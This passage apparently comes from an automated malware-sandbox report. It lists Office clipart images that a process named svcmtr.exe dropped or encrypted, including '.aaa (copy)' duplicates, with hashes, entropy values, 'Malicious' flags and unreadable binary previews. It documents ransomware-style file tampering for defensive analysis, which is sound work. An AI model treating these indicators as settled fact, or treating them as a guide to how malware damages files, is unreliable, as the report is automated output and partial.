                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...'I.0d......,...}..3.Yz.......E^.....AJn...=....C..,]-...l.g.............."D..(Tx.....}.z...n..1.]D ....6.....^[L..K..(.s....\.Rog....g.@}.|.......I.......,6........fP.H.;6.AL.X.....wC.4Z.........A...uc......./C.R7....,..W....u+.....W.2.........P..q1c.k.O>.......s.&..5.0j?.........G]oaCZ1..D&..+..K...+.o...J..7N. .i......,.I.B.......O....k...&.m....K.L....V...6...95...O.h.T.(L.8l2.=a....7/.....o!6......f.V..}.y..1w..0xA..Zdn..WN..4.':..m.v.c.Np..G.1.#....ukM....9^..N.r.N...kN ..c%.q.Z....S\.p3Ub..x....J...L9EX...$..k.5..w....U...*&.c.o$.).%s..&...d.....V..VI.C.#?....

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32670
                                                                                                                          Entropy (8bit):7.993974679204377
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GYskjUBMsFLR9gyow/2orrqovrLcFQeWW6POd:ekj+MsTDoxo/WFXd
                                                                                                                          MD5:B2557DB402C3224A6C20FA9B15B1F72D
                                                                                                                          SHA1:D1756B5D91A7684B987F6F115D12C4C280C71614
                                                                                                                          SHA-256:C6CE5839C100EF241A7F4B142B9359776043AA9748E37060533D9FC7F59F9CF4
                                                                                                                          SHA-512:C9745A564FF8258CDBB17D174287F96982D7CAAF1183A93A25A53FFA65AA53C13E0434890343004C2595B19C70031C3FED7870EB4E7CD25ECC4151229517825B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...'I.0d......,...}..3.Yz.......E^.....AJn...=....C..,]-...l.g.............."D..(Tx.....}.z...n..1.]D ....6.....^[L..K..(.s....\.Rog....g.@}.|.......I.......,6........fP.H.;6.AL.X.....wC.4Z.........A...uc......./C.R7....,..W....u+.....W.2.........P..q1c.k.O>.......s.&..5.0j?.........G]oaCZ1..D&..+..K...+.o...J..7N. .i......,.I.B.......O....k...&.m....K.L....V...6...95...O.h.T.(L.8l2.=a....7/.....o!6......f.V..}.y..1w..0xA..Zdn..WN..4.':..m.v.c.Np..G.1.#....ukM....9^..N.r.N...kN ..c%.q.Z....S\.p3Ub..x....J...L9EX...$..k.5..w....U...*&.c.o$.).%s..&...d.....V..VI.C.#?....

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):14014
                                                                                                                          Entropy (8bit):7.982128019097481
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GQalL8qh4kmiQHd1xJjrx8qnH+fabjKEON5A3oAW:GJ53QHHjyqnLOM3oJ
                                                                                                                          MD5:3EC292CC41380F39BEFE685467867D70
                                                                                                                          SHA1:92BF3F936B814D310F6E6161E9CB77C7AEAA6488
                                                                                                                          SHA-256:A86D470ED48C94CEC6DC492DC4DCA9ED46014C5ACE3823E22DE1F73B81889D1A
                                                                                                                          SHA-512:F7768C23A9ECC7E63FF50450FCBE3B8EF9B48A80C0914788CFF31E47846BAF4DA19FE2FB0D4DAE401177D959F1B619477A2DF92C5298316038F356736997D44E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..A.........u.+.g.5.....x....:2. n.g.=.{.A.$..`;...o......lW{.........A2.O...VB..z.f......`.-......3.6.6....V....;...N.....$ ..=...g..L..D..M&U.mO.U`.....OVa..{.1}$gu.....i.t.7$.Q.......U.1.G.G..ge.....=.............:8*.J..I.8..,.._.Nc7..F...V.Hw7^..)5bwat-........v.#.v....v>yG.f....P.< 7..h...c.......x......i..Aw......]/....@3..4Q%u.$.@N.+..k.......Z."b.=U}...!r."/%.0].S.@..[z...7i....V..e`T3.0.b.... .#.2....)...t..u.....4KJb.K1.R.:....&.........O.a..h'."5GkSx.....w.....%i.x.Y.PR.....w>...C]8On%.7.m=].@L....9........U.[....>.~.7n..V.......il...:T...)K..D..M.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):14014
                                                                                                                          Entropy (8bit):7.982128019097481
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GQalL8qh4kmiQHd1xJjrx8qnH+fabjKEON5A3oAW:GJ53QHHjyqnLOM3oJ
                                                                                                                          MD5:3EC292CC41380F39BEFE685467867D70
                                                                                                                          SHA1:92BF3F936B814D310F6E6161E9CB77C7AEAA6488
                                                                                                                          SHA-256:A86D470ED48C94CEC6DC492DC4DCA9ED46014C5ACE3823E22DE1F73B81889D1A
                                                                                                                          SHA-512:F7768C23A9ECC7E63FF50450FCBE3B8EF9B48A80C0914788CFF31E47846BAF4DA19FE2FB0D4DAE401177D959F1B619477A2DF92C5298316038F356736997D44E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..A.........u.+.g.5.....x....:2. n.g.=.{.A.$..`;...o......lW{.........A2.O...VB..z.f......`.-......3.6.6....V....;...N.....$ ..=...g..L..D..M&U.mO.U`.....OVa..{.1}$gu.....i.t.7$.Q.......U.1.G.G..ge.....=.............:8*.J..I.8..,.._.Nc7..F...V.Hw7^..)5bwat-........v.#.v....v>yG.f....P.< 7..h...c.......x......i..Aw......]/....@3..4Q%u.$.@N.+..k.......Z."b.=U}...!r."/%.0].S.@..[z...7i....V..e`T3.0.b.... .#.2....)...t..u.....4KJb.K1.R.:....&.........O.a..h'."5GkSx.....w.....%i.x.Y.PR.....w>...C]8On%.7.m=].@L....9........U.[....>.~.7n..V.......il...:T...)K..D..M.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):203310
                                                                                                                          Entropy (8bit):7.99907789331035
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:9Qnl4GDUDp0/OEXxbZdns47BmXm1x5hakIAgSrNOTuFZqUjYshU5GmOXaoC7VHSv:9A1Dn/O4xHnv1nhwA8Tumy3U5GJqHp4B
                                                                                                                          MD5:F8408F8A1FA59EF1E88E7F8856DD9067
                                                                                                                          SHA1:A31FD57013390645C2A4B056424244859C569919
                                                                                                                          SHA-256:38BC49A2D2DA6F456DEB13B4F5770ABEFF4BC7C603EA1A5BEA9081C985954208
                                                                                                                          SHA-512:6703BFE276B52A2DABD5A032A100379FA89CCCEFF345A9EEA78BD0E06942605B671953FAC527603C7669923ABDC870B1AD52529D53BDCE69DA7BAB0B5ACA104D
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..#,...H8:#.y..!~........I./...Z........q.D....{.^......|...:..\u....UoD..&.D..<.EQ.P.23...*..]...Ni.....vp.{1.Fj..~H....7.>.....- .."8.O#VF..mk+..{od..;kd......}R.U....0...]....M..D1...x..G.2.?$f.*~S/f4a_[..?qB....~.7......MI:.........)b._....Q.!..<K.7.v....h3..L.#.H;..9l..i.R.D.|.....U.....8]..J.....O...>5f...Zg..r.F.L..H.5..Z=.........0..`b.:..\...W.a.0|b."...o%.......7.....{N.........f[]..x=.....68.S,^5..G.^.........vt....W).9.C._~.I.1....4......I..H.qq..7n....._.kz..u.S....pK...4..2vw.!i...y.Y..r.f........_=.........~;,8#..O-N.....N....... 5.K.F.HQ.j.4........`Gg..o.n.sNQ]v...e

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):203310
                                                                                                                          Entropy (8bit):7.99907789331035
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:9Qnl4GDUDp0/OEXxbZdns47BmXm1x5hakIAgSrNOTuFZqUjYshU5GmOXaoC7VHSv:9A1Dn/O4xHnv1nhwA8Tumy3U5GJqHp4B
                                                                                                                          MD5:F8408F8A1FA59EF1E88E7F8856DD9067
                                                                                                                          SHA1:A31FD57013390645C2A4B056424244859C569919
                                                                                                                          SHA-256:38BC49A2D2DA6F456DEB13B4F5770ABEFF4BC7C603EA1A5BEA9081C985954208
                                                                                                                          SHA-512:6703BFE276B52A2DABD5A032A100379FA89CCCEFF345A9EEA78BD0E06942605B671953FAC527603C7669923ABDC870B1AD52529D53BDCE69DA7BAB0B5ACA104D
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..#,...H8:#.y..!~........I./...Z........q.D....{.^......|...:..\u....UoD..&.D..<.EQ.P.23...*..]...Ni.....vp.{1.Fj..~H....7.>.....- .."8.O#VF..mk+..{od..;kd......}R.U....0...]....M..D1...x..G.2.?$f.*~S/f4a_[..?qB....~.7......MI:.........)b._....Q.!..<K.7.v....h3..L.#.H;..9l..i.R.D.|.....U.....8]..J.....O...>5f...Zg..r.F.L..H.5..Z=.........0..`b.:..\...W.a.0|b."...o%.......7.....{N.........f[]..x=.....68.S,^5..G.^.........vt....W).9.C._~.I.1....4......I..H.qq..7n....._.kz..u.S....pK...4..2vw.!i...y.Y..r.f........_=.........~;,8#..O-N.....N....... 5.K.F.HQ.j.4........`Gg..o.n.sNQ]v...e

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):89838
                                                                                                                          Entropy (8bit):7.99793205066853
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:+AHBJMWdeQJiUuIBwBjeCupXnN8cu4j1gWG0hzuzB6f7mICWX5I0S+bM2+ESwMXW:+AHPiUuf9S3aD4G0kIiNabubtrC
                                                                                                                          MD5:6684D40273D4E4FE206FA24E84168304
                                                                                                                          SHA1:01C54921E0E193D24D067CD64C46CEA11867CE88
                                                                                                                          SHA-256:6E942310002D1A88A0CDB83D4B36E2508E865C78A57AC8DDA284D88868F28C80
                                                                                                                          SHA-512:9B7226680663C5A366AC51CA289B7153B9543AAF8532D6973E06748B0ECE9E65B3DAD854489C56EEA96E7D59907434FEAEBFC8CBFE661DD69E552EFE37143771
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....J....+"f.....I]...qz....jF..5...p.Op.xs....yqs.. .3.".\.X....=.{.....n...m..0{.]..N.!..\|6..9.az.^...].y/N.,..g..A....>.X..D...........X....3.v.a......S3.C.!.T.K...~..d..S.. ..Q...Y..P.Tt.,=..^4.....$..W.?m...E....Gz..y.8]./.C....c.u*I..?...{IS......5b.XI..Y_.o.....r..M.em...(...6...+.M.F.!...d.:.G`iX.........H..q.....ZM-...f4.A.%;.>#...)....g.....eh.}U6....%..>nZ(..:W.1....6.O...YI.q.LI;........F..j.e......?.X........e.. V.l{...W.n}I..e...M.^...i.L..]Eo\.s......[.Q.QZC.Xw.g..E`.s.nc.b..)..3..7 @..0......Z...Z...o.>.mW..&.h...-.4...H......M.uq.V#...ym....,..W..

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):89838
                                                                                                                          Entropy (8bit):7.99793205066853
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:+AHBJMWdeQJiUuIBwBjeCupXnN8cu4j1gWG0hzuzB6f7mICWX5I0S+bM2+ESwMXW:+AHPiUuf9S3aD4G0kIiNabubtrC
                                                                                                                          MD5:6684D40273D4E4FE206FA24E84168304
                                                                                                                          SHA1:01C54921E0E193D24D067CD64C46CEA11867CE88
                                                                                                                          SHA-256:6E942310002D1A88A0CDB83D4B36E2508E865C78A57AC8DDA284D88868F28C80
                                                                                                                          SHA-512:9B7226680663C5A366AC51CA289B7153B9543AAF8532D6973E06748B0ECE9E65B3DAD854489C56EEA96E7D59907434FEAEBFC8CBFE661DD69E552EFE37143771
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....J....+"f.....I]...qz....jF..5...p.Op.xs....yqs.. .3.".\.X....=.{.....n...m..0{.]..N.!..\|6..9.az.^...].y/N.,..g..A....>.X..D...........X....3.v.a......S3.C.!.T.K...~..d..S.. ..Q...Y..P.Tt.,=..^4.....$..W.?m...E....Gz..y.8]./.C....c.u*I..?...{IS......5b.XI..Y_.o.....r..M.em...(...6...+.M.F.!...d.:.G`iX.........H..q.....ZM-...f4.A.%;.>#...)....g.....eh.}U6....%..>nZ(..:W.1....6.O...YI.q.LI;........F..j.e......?.X........e.. V.l{...W.n}I..e...M.^...i.L..]Eo\.s......[.Q.QZC.Xw.g..E`.s.nc.b..)..3..7 @..0......Z...Z...o.>.mW..&.h...-.4...H......M.uq.V#...ym....,..W..

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125406
                                                                                                                          Entropy (8bit):7.998554824046652
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:I6gvUVmtf7FONScvk0hevM+T7n912ZpAb7aSdPpjolfMOP:VC4md7QS8kkevMgSpAb+SAf9
                                                                                                                          MD5:5459210CEF20FCB1645E313E7337D1AE
                                                                                                                          SHA1:19DAEE16C628A91546835AF087CB66769624D018
                                                                                                                          SHA-256:F92B2D19EC5F9C6B9418B7E29D6E6960D61336E88CE6EA8C001F0F2E34623EE5
                                                                                                                          SHA-512:F5E4DF71077E2A9C869488D95FE591CF18C15CEBE50991870C8AF37A53ADADB733E8C1B53759B846BAA130A43098635DC6252CA15E557D634ABEE19C499CDB14
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....o.......I".l.6....A..c@9j.....A*.|.+J...]e.wO.....a..7......1...Ql..5..._v..I)*3q..U&..1.m. /....4...w..}.N.."...`......N.?v..E@6.h....AN8.Q.k.i.q..PB....*]k.`..g....W...}......0....F9.%R8x(........].S6E..O..M.........V{OB{.Y.-.qZs")d4.}#..m..|..m......sR.V...-cx.$0...`..5...4_rc....._+3...(...w...[. .b.#.:B...Hf..z./B...U.d.n..z.PS2.qB%...D.M.`.R.ex...E.W4m.P..h-....n.9.'.r.|.g*..b..6......F..D.p....9.;...b...M.b$........z...`G..W..uq~..c-.I...qf...K'.G[.+.[L;...N..N.q.......].["#;..U~....v...*.k.<...B...K...\....l.:.>'.B%....&..p.&.4.......9......x.{ k......A..Ty

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125406
                                                                                                                          Entropy (8bit):7.998554824046652
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:I6gvUVmtf7FONScvk0hevM+T7n912ZpAb7aSdPpjolfMOP:VC4md7QS8kkevMgSpAb+SAf9
                                                                                                                          MD5:5459210CEF20FCB1645E313E7337D1AE
                                                                                                                          SHA1:19DAEE16C628A91546835AF087CB66769624D018
                                                                                                                          SHA-256:F92B2D19EC5F9C6B9418B7E29D6E6960D61336E88CE6EA8C001F0F2E34623EE5
                                                                                                                          SHA-512:F5E4DF71077E2A9C869488D95FE591CF18C15CEBE50991870C8AF37A53ADADB733E8C1B53759B846BAA130A43098635DC6252CA15E557D634ABEE19C499CDB14
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....o.......I".l.6....A..c@9j.....A*.|.+J...]e.wO.....a..7......1...Ql..5..._v..I)*3q..U&..1.m. /....4...w..}.N.."...`......N.?v..E@6.h....AN8.Q.k.i.q..PB....*]k.`..g....W...}......0....F9.%R8x(........].S6E..O..M.........V{OB{.Y.-.qZs")d4.}#..m..|..m......sR.V...-cx.$0...`..5...4_rc....._+3...(...w...[. .b.#.:B...Hf..z./B...U.d.n..z.PS2.qB%...D.M.`.R.ex...E.W4m.P..h-....n.9.'.r.|.g*..b..6......F..D.p....9.;...b...M.b$........z...`G..W..uq~..c-.I...qf...K'.G[.+.[L;...N..N.q.......].["#;..U~....v...*.k.<...B...K...\....l.:.>'.B%....&..p.&.4.......9......x.{ k......A..Ty

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105470
                                                                                                                          Entropy (8bit):7.998122448862424
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MyvWHncfr1Trg3Q+QYH7ShyF7EjWQGPoMuNnnocHzQjX9D9nBklrVH15TxtiVUbj:ka1A6YHGE7SGPoMQZHMFKh152y5LWWp
                                                                                                                          MD5:2E9F06E15B991039F83214390AFFA4D0
                                                                                                                          SHA1:91BE962936D0B2A53DFE8FB1FF7FCFC23F28BBC1
                                                                                                                          SHA-256:BCCE2FF2416866EBB4058E4288AC143C5D661CD3360ED36ECDEA4D66E4EB4BB2
                                                                                                                          SHA-512:C86A78BB6746FE7F3069487923E725C67469EBE21CAB26A166378B01CCF537D14D0DFEA351F02CAADB047EE67F06881A76B04D8595361FA9ADE03933E6ED8AB0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..T5x....-.O|,...]....%.......V.W0.....7...p_.}..47.2..3..p.S....S..d..>a.......f..H...6.A;h.w...x..V],Ht.z{.~e.5......*..%......0...U;.z.:..V.u.;.r.X...t...\C.v*...@.. ;.Q.....*.o.....{.}.1x.m....O_..W...~..T...A3....`L..M.....^.N......+..\=1...>...y`........8.^.Jw.......:../.O..b{4..d..u.UW9......T/.kC..O...R...R ...Owg01".).?fT.K.a...~...Ts..'..?;....M/8..W(p:..m.1b...A...(..N..0...jqg..M....m..(..x.lF(...+}...6.H.y........n......T.npH.<.#....;..v.$.[3.u.....Eb...._<.H).;..k../`...i=...&(3.U.YZN...f.p.u.0y.lt...QgT..u.OC..w.kg0..O..c.{..-..T.....Wt....jd..........sU.a....L...I.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105470
                                                                                                                          Entropy (8bit):7.998122448862424
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MyvWHncfr1Trg3Q+QYH7ShyF7EjWQGPoMuNnnocHzQjX9D9nBklrVH15TxtiVUbj:ka1A6YHGE7SGPoMQZHMFKh152y5LWWp
                                                                                                                          MD5:2E9F06E15B991039F83214390AFFA4D0
                                                                                                                          SHA1:91BE962936D0B2A53DFE8FB1FF7FCFC23F28BBC1
                                                                                                                          SHA-256:BCCE2FF2416866EBB4058E4288AC143C5D661CD3360ED36ECDEA4D66E4EB4BB2
                                                                                                                          SHA-512:C86A78BB6746FE7F3069487923E725C67469EBE21CAB26A166378B01CCF537D14D0DFEA351F02CAADB047EE67F06881A76B04D8595361FA9ADE03933E6ED8AB0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..T5x....-.O|,...]....%.......V.W0.....7...p_.}..47.2..3..p.S....S..d..>a.......f..H...6.A;h.w...x..V],Ht.z{.~e.5......*..%......0...U;.z.:..V.u.;.r.X...t...\C.v*...@.. ;.Q.....*.o.....{.}.1x.m....O_..W...~..T...A3....`L..M.....^.N......+..\=1...>...y`........8.^.Jw.......:../.O..b{4..d..u.UW9......T/.kC..O...R...R ...Owg01".).?fT.K.a...~...Ts..'..?;....M/8..W(p:..m.1b...A...(..N..0...jqg..M....m..(..x.lF(...+}...6.H.y........n......T.npH.<.#....;..v.$.[3.u.....Eb...._<.H).;..k../`...i=...&(3.U.YZN...f.p.u.0y.lt...QgT..u.OC..w.kg0..O..c.{..-..T.....Wt....jd..........sU.a....L...I.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):96494
                                                                                                                          Entropy (8bit):7.998267792969075
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:gIRZiZbtUSdnKXuboePFmkX/VqRlLGEO1Xv4vlJKBIo2ZUQWVnGiwhVx5aA8:bynToeEkPIGJ1XwvmIqQW0zhVxV8
                                                                                                                          MD5:3CFB9A4EC67395CB74D160A031907066
                                                                                                                          SHA1:DCBEC020690129ABDE37DDB7F91391A151B207AE
                                                                                                                          SHA-256:7495D175230D48ECA45942AF13FD965FAE8E2F33A32D780D7F47317BF002B5CC
                                                                                                                          SHA-512:4495C0030ABAE7DFB9D5E6D9E2BDCEA21079AF3DF35EBCADB605A35C7C4CC26B94151ADBA7F9CE21DA35C9A85635AA43D7C7A8AE0588147BE38DD3F4D417E627
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...c//(.#...;...aBw.......}.9N)B.W..e1.U..3.....^.&.1.. ......Q.T<...]..mg.'..W%...Y...!....h...=..M..GL....y9.I.q8b....n..r..;.......B....N.x.?.<....*...3w.....Q....m.Ql.B......K=........Y.+...............H.]..U...Z.....F...m.tk.>.jP{%..5.*.........."....l..l.Y2.u....J........K.^.M..7./o.P.j.|v..0.v...e..X.##..q..kDbuP.2'8.......Gt...I._.[j.8.5...H+.@%...e.k...|$?#.AE.!^.B.<..ZRH...\.Y9.L.Z..$!....<........#B.e.5..C...:\D|0.(.}.........T....2..^L...9..r!x~...p...{.w..t.<,O..=_X...V.g..=t.....6Y.+[.J.......#D..ZM.......4.z2/......H:W..3W....zd...N......vg...2?..9.$.

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):96494
                                                                                                                          Entropy (8bit):7.998267792969075
                                                                                                                          Encrypted:true
